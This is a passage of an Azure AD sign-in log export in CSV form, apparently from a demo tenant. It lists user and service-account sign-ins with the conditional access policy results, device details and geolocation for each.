{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:56,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",db359221-fdda-4bf1-8b37-6f46e1440800,,,"{'countryOrRegion': 'DZ', 'geoCoordinates': {'longitude': 3, 'latitude': 28}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,db359221-fdda-4bf1-8b37-6f46e1440800,SigninLogs,Sucess,28,3
+231,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:00.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8e7a6c60-0c09-473f-9b19-91ec412de5c1,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 06:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",6c1d2f35-9fdd-4afe-865b-1042cf560600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,6c1d2f35-9fdd-4afe-865b-1042cf560600,SigninLogs,Sucess,36.6404686,-78.26995087
+232,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:22.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d6bf911a-14b2-4053-b250-0af0d2433aef,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 12:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",c3a23e25-0820-4eee-81ce-29ebf9781200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,c3a23e25-0820-4eee-81ce-29ebf9781200,SigninLogs,Sucess,36.6404686,-78.26995087
+233,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,39:30.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,35fdddb9-6b08-400a-aca3-179a2a0ee7ab,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Augmentation Loop,2abdc806-e091-4495-9b10-b04d93c3f040,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:39,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",aa57d52a-288e-488c-a4a9-011bcf361b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Augmentation Loop,aa57d52a-288e-488c-a4a9-011bcf361b00,SigninLogs,Sucess,33.7984581,-84.38828278
+234,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,39:16.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b0455268-27d5-45ba-8a51-1b15f2a1b9ca,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:39,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",b820b578-3403-4df9-9305-b26776041d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,b820b578-3403-4df9-9305-b26776041d00,SigninLogs,Sucess,33.7984581,-84.38828278
+235,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:35.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,acd5b4ab-f163-4bc1-b5e5-bae6bb561531,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:28,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",5fa972fe-7fa8-4b4b-bbdd-e602e6881400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,5fa972fe-7fa8-4b4b-bbdd-e602e6881400,SigninLogs,Sucess,33.7984581,-84.38828278
+236,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,05:40.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8ee49ce6-0d93-4a88-b15a-3b44bae01973,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,08/04/2020 15:05,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",5423bf62-9037-4448-bcaa-3033d8241000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,5423bf62-9037-4448-bcaa-3033d8241000,SigninLogs,Sucess,33.7984581,-84.38828278
+237,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:33.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,eac8469f-40ac-0000-5683-47af378b51c7,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:21,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",89223cb6-60af-4a3e-b2e1-94705eb41100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,89223cb6-60af-4a3e-b2e1-94705eb41100,SigninLogs,Sucess,33.7984581,-84.38828278
+238,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:51.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f6ed10a4-126f-4cd1-a4d8-daf4dd166a49,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:20,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",3b0e5c51-5aba-4adb-89c0-6eab4e9f1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,3b0e5c51-5aba-4adb-89c0-6eab4e9f1200,SigninLogs,Sucess,41.90428925,-85.99833679
